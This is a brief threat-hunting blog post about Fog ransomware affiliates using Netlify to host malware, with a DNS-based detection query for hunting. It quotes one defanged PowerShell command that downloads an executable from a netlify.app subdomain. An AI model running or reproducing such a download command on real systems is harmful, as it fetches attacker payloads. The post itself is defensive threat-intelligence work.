335. Adversaries Abuse Netlify for Malware Delivery

Hello everyone!

Today we'll look at another example of Ingress Tool Transfer (T1105). And this time adversaries used Netlify to store malicious files.

According to the report, Fog ransomeware affiliates used PowerShell to download malicious files, for example:

iwr -uri 'hxxps://hilarious-trifle-d9182e.netlify[.]app/ktool.exe' -outfile $temppath

As you can see, they used Netlify, a legitimate platform for building, deploying, and scaling web apps, to store those files.

To tell the truth, it's not the first time I see adversaries use it, so it's another good target for hunting:

event_type: "dnsreqwin"

AND

dns_rname: "netlify.app"

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge